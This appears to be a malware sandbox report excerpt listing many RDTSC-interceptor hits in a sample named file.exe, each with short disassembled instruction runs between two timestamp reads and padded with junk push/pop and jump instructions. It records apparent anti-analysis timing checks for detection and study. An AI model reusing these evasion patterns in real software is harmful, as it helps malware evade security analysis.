Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549AE4 second address: 549AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C64B second address: 54C651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CA38 second address: 54CA45 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54CA45 second address: 54CA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94B1h 0x00000009 pop esi 0x0000000a jc 00007F5954CE94ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55368D second address: 5536AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A8h 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5536AD second address: 5536B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5536B3 second address: 5536B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5536B8 second address: 5536CC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5954CE94AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5536CC second address: 5536E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jnp 00007F595561499Eh 0x00000011 jno 00007F5955614996h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553834 second address: 553839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553B13 second address: 553B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE90A second address: 4FE942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5954CE94B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE942 second address: 4FE946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE9E8 second address: 4FE9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE9EE second address: 4FE9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554AE2 second address: 554AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554AEA second address: 554AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559429 second address: 559439 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5954CE94A6h 0x00000008 jbe 00007F5954CE94A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559439 second address: 559440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559440 second address: 559451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F5954CE94C4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559451 second address: 559457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559457 second address: 55945B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55945B second address: 559465 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5955614996h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55913F second address: 559143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559143 second address: 559147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559147 second address: 55915B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55915B second address: 559163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D360 second address: 55D366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D366 second address: 55D376 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D376 second address: 55D37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C921 second address: 55C940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F5955614996h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C940 second address: 55C946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C946 second address: 55C966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jbe 00007F5955614996h 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 jbe 00007F59556149A2h 0x00000018 jnl 00007F5955614996h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CEBA second address: 55CEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F5954CE94ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CEC7 second address: 55CED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56536E second address: 565374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56346D second address: 563473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563473 second address: 563477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563477 second address: 5634A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F595561499Ah 0x00000007 jmp 00007F595561499Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F59556149A0h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563749 second address: 56376C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5954CE94B0h 0x00000008 jnl 00007F5954CE94A6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56376C second address: 563770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564227 second address: 56422E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564823 second address: 564838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F59556149A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564DE4 second address: 564DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D888 second address: 56D8C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A0h 0x00000007 jmp 00007F59556149A1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnc 00007F5955614996h 0x00000015 jnc 00007F5955614996h 0x0000001b jmp 00007F595561499Bh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DB78 second address: 56DB83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DB83 second address: 56DBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5955614996h 0x0000000a jg 00007F5955614996h 0x00000010 popad 0x00000011 pushad 0x00000012 jnp 00007F59556149ADh 0x00000018 jmp 00007F59556149A7h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBB6 second address: 56DBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBBC second address: 56DBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBC0 second address: 56DBE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B8h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F5954CE94AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DD6E second address: 56DD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E180 second address: 56E186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577A4F second address: 577A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e jns 00007F5955614998h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576287 second address: 57628D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57628D second address: 576291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57654A second address: 57654E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57654E second address: 57656B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F59556149A3h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576807 second address: 57680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57680B second address: 576811 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576811 second address: 57681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57681E second address: 57686B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A0h 0x00000009 jl 00007F5955614996h 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 pushad 0x00000013 jmp 00007F59556149A7h 0x00000018 jmp 00007F59556149A6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57686B second address: 576875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5769BE second address: 5769C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5769C2 second address: 5769DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577930 second address: 577935 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D331 second address: 57D33B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5954CE94A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D33B second address: 57D341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D341 second address: 57D346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D346 second address: 57D35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D35F second address: 57D370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F5954CE94AEh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D4CD second address: 57D4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5955614996h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FDE3 second address: 57FDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FDE9 second address: 57FDEF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FDEF second address: 57FDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FDF6 second address: 57FDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A344 second address: 58A349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A349 second address: 58A350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A350 second address: 58A365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A365 second address: 58A37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F59556149A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDE5 second address: 58CDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F5954CE94AAh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDF6 second address: 58CDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDFC second address: 58CE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CE0E second address: 58CE12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CE12 second address: 58CE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CE18 second address: 58CE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F5955614996h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C801 second address: 58C813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597EB8 second address: 597ECA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F5955614996h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597ECA second address: 597EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F5954CE94ADh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B643E second address: 4B6444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6444 second address: 4B6467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5954CE94A6h 0x0000000a js 00007F5954CE94A6h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F5954CE94A6h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6467 second address: 4B646B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A740A second address: 5A7424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7424 second address: 5A7432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5955614998h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7432 second address: 5A7447 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7447 second address: 5A744D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7B7C second address: 5A7B8F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7E7E second address: 5A7EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F595561499Eh 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F59556149ADh 0x00000015 jmp 00007F59556149A4h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7EC7 second address: 5A7ECE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC44D second address: 5AC462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F59556149AAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jnp 00007F5955614996h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC462 second address: 5AC466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ABF85 second address: 5ABF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F595561499Ch 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC0EB second address: 5AC0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
